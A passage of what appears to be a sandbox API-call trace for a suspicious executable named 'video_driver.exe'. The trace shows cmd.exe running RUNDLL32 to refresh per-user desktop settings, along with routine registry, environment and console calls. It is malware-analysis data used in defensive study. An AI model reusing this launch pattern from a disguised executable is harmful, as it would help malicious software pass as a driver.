lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f724 | out: phkResult=0x32f724*=0x0) returned 0x2 [0041.419] VirtualQuery (in: lpAddress=0x32f75b, lpBuffer=0x32f6f4, dwLength=0x1c | out: lpBuffer=0x32f6f4*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0041.419] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f6f4, dwLength=0x1c | out: lpBuffer=0x32f6f4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0041.419] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f6f4, dwLength=0x1c | out: lpBuffer=0x32f6f4*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0041.419] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f6f4, dwLength=0x1c | out: lpBuffer=0x32f6f4*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0041.419] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f6f4, dwLength=0x1c | out: lpBuffer=0x32f6f4*(BaseAddress=0x330000, AllocationBase=0x330000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0041.419] GetConsoleOutputCP () returned 0x1b5 [0041.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49df4260 | out: lpCPInfo=0x49df4260) returned 1 [0041.420] SetConsoleCtrlHandler (HandlerRoutine=0x49dee72a, Add=1) returned 1 [0041.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.420] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0041.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.420] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49df41ac | out: lpMode=0x49df41ac) returned 1 [0041.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.421] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0041.421] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.421] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49df41b0 | out: lpMode=0x49df41b0) returned 1 [0041.421] GetEnvironmentStringsW () returned 0x7620d0* [0041.421] GetProcessHeap () returned 0x750000 [0041.421] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xaca) returned 0x762ba8 [0041.421] FreeEnvironmentStringsW (penv=0x7620d0) returned 1 [0041.422] GetProcessHeap () returned 0x750000 [0041.422] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4) returned 0x761870 [0041.422] GetEnvironmentStringsW () returned 0x7620d0* [0041.422] GetProcessHeap () returned 0x750000 [0041.422] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xaca) returned 0x763680 [0041.422] FreeEnvironmentStringsW (penv=0x7620d0) returned 1 [0041.422] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e694 | out: phkResult=0x32e694*=0x68) returned 0x0 [0041.422] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x0, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.422] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x1, lpcbData=0x32e698*=0x4) returned 0x0 [0041.422] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x1, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x0, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x40, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x40, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x40, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.423] RegCloseKey (hKey=0x68) returned 0x0 [0041.423] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e694 | out: phkResult=0x32e694*=0x68) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x40, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x1, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x1, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x0, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x9, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x4, lpData=0x32e6a0*=0x9, lpcbData=0x32e698*=0x4) returned 0x0 [0041.423] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e69c, lpData=0x32e6a0, lpcbData=0x32e698*=0x1000 | out: lpType=0x32e69c*=0x0, lpData=0x32e6a0*=0x9, lpcbData=0x32e698*=0x1000) returned 0x2 [0041.424] RegCloseKey (hKey=0x68) returned 0x0 [0041.424] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b61 [0041.424] srand (_Seed=0x5eb34b61) [0041.424] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0041.424] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0041.424] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49df5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.424] GetProcessHeap () returned 0x750000 [0041.424] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x210) returned 0x7620d0 [0041.424] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7620d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0041.425] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.425] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.425] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0041.425] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0041.425] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0041.425] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0041.425] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0041.425] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0041.425] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0041.425] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0041.425] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0041.425] GetProcessHeap () returned 0x750000 [0041.425] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x762ba8 | out: hHeap=0x750000) returned 1 [0041.425] GetEnvironmentStringsW () returned 0x7622e8* [0041.425] GetProcessHeap () returned 0x750000 [0041.425] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xae2) returned 0x764c48 [0041.425] FreeEnvironmentStringsW (penv=0x7622e8) returned 1 [0041.426] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.426] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e00640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.426] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0041.426] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0041.426] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0041.426] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0041.426] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0041.426] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0041.426] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0041.426] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0041.426] GetProcessHeap () returned 0x750000 [0041.426] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x7617a0 [0041.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f460 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f460, lpFilePart=0x32f45c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f45c*="Desktop") returned 0x25 [0041.426] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.426] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f1dc | out: lpFindFileData=0x32f1dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x765738 [0041.427] FindClose (in: hFindFile=0x765738 | out: hFindFile=0x765738) returned 1 [0041.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f1dc | out: lpFindFileData=0x32f1dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfe3b9a80, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xfe3b9a80, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x765738 [0041.427] FindClose (in: hFindFile=0x765738 | out: hFindFile=0x765738) returned 1 [0041.427] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0041.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f1dc | out: lpFindFileData=0x32f1dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x765738 [0041.427] FindClose (in: hFindFile=0x765738 | out: hFindFile=0x765738) returned 1 [0041.427] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.427] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0041.427] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0041.427] GetProcessHeap () returned 0x750000 [0041.427] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x764c48 | out: hHeap=0x750000) returned 1 [0041.428] GetEnvironmentStringsW () returned 0x764158* [0041.428] GetProcessHeap () returned 0x750000 [0041.428] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb36) returned 0x765f78 [0041.428] FreeEnvironmentStringsW (penv=0x764158) returned 1 [0041.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49df5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.428] GetProcessHeap () returned 0x750000 [0041.428] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7617a0 | out: hHeap=0x750000) returned 1 [0041.428] GetProcessHeap () returned 0x750000 [0041.428] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400e) returned 0x766ab8 [0041.429] GetProcessHeap () returned 0x750000 [0041.429] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x88) returned 0x762e28 [0041.429] GetProcessHeap () returned 0x750000 [0041.429] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x766ab8 | out: hHeap=0x750000) returned 1 [0041.429] GetConsoleOutputCP () returned 0x1b5 [0041.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49df4260 | out: lpCPInfo=0x49df4260) returned 1 [0041.429] GetUserDefaultLCID () returned 0x409 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49df4950, cchData=8 | out: lpLCData=":") returned 2 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f5a0, cchData=128 | out: lpLCData="0") returned 2 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f5a0, cchData=128 | out: lpLCData="0") returned 2 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f5a0, cchData=128 | out: lpLCData="1") returned 2 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49df4940, cchData=8 | out: lpLCData="/") returned 2 [0041.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49df4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49df4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49df4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49df4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49df4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49df4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49df4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49df4930, cchData=8 | out: lpLCData=".") returned 2 [0041.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49df4920, cchData=8 | out: lpLCData=",") returned 2 [0041.431] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0041.432] GetProcessHeap () returned 0x750000 [0041.432] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20c) returned 0x762eb8 [0041.432] GetConsoleTitleW (in: lpConsoleTitle=0x762eb8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0041.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0041.433] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0041.433] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0041.433] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0041.433] GetProcessHeap () returned 0x750000 [0041.433] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400a) returned 0x766ab8 [0041.433] GetProcessHeap () returned 0x750000 [0041.433] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x766ab8 | out: hHeap=0x750000) returned 1 [0041.435] _wcsicmp (_String1="RUNDLL32.EXE", _String2=")") returned 73 [0041.435] _wcsicmp (_String1="FOR", _String2="RUNDLL32.EXE") returned -12 [0041.435] _wcsicmp (_String1="FOR/?", _String2="RUNDLL32.EXE") returned -12 [0041.435] _wcsicmp (_String1="IF", _String2="RUNDLL32.EXE") returned -9 [0041.435] _wcsicmp (_String1="IF/?", _String2="RUNDLL32.EXE") returned -9 [0041.435] _wcsicmp (_String1="REM", _String2="RUNDLL32.EXE") returned -16 [0041.435] _wcsicmp (_String1="REM/?", _String2="RUNDLL32.EXE") returned -16 [0041.435] GetProcessHeap () returned 0x750000 [0041.435] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x58) returned 0x7630d0 [0041.435] GetProcessHeap () returned 0x750000 [0041.435] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x22) returned 0x7617d8 [0041.436] GetProcessHeap () returned 0x750000 [0041.437] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6c) returned 0x763130 [0041.437] GetConsoleTitleW (in: lpConsoleTitle=0x32f298, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0041.438] GetFileAttributesW (lpFileName="RUNDLL32.EXE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rundll32.exe")) returned 0xffffffff [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0041.439] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0041.440] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0041.441] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="FOR") returned 12 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="IF") returned 9 [0041.442] _wcsicmp (_String1="RUNDLL32", _String2="REM") returned 16 [0041.443] GetProcessHeap () returned 0x750000 [0041.443] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x210) returned 0x7631a8 [0041.443] GetProcessHeap () returned 0x750000 [0041.443] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x86) returned 0x7633c0 [0041.443] _wcsnicmp (_String1="RUND", _String2="cmd ", _MaxCount=0x4) returned 15 [0041.444] GetProcessHeap () returned 0x750000 [0041.444] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x418) returned 0x7507f0 [0041.444] SetErrorMode (uMode=0x0) returned 0x0 [0041.444] SetErrorMode (uMode=0x1) returned 0x0 [0041.444] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7507f8, lpFilePart=0x32edb8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32edb8*="Desktop") returned 0x25 [0041.444] SetErrorMode (uMode=0x0) returned 0x1 [0041.444] GetProcessHeap () returned 0x750000 [0041.444] RtlReAllocateHeap (Heap=0x750000, 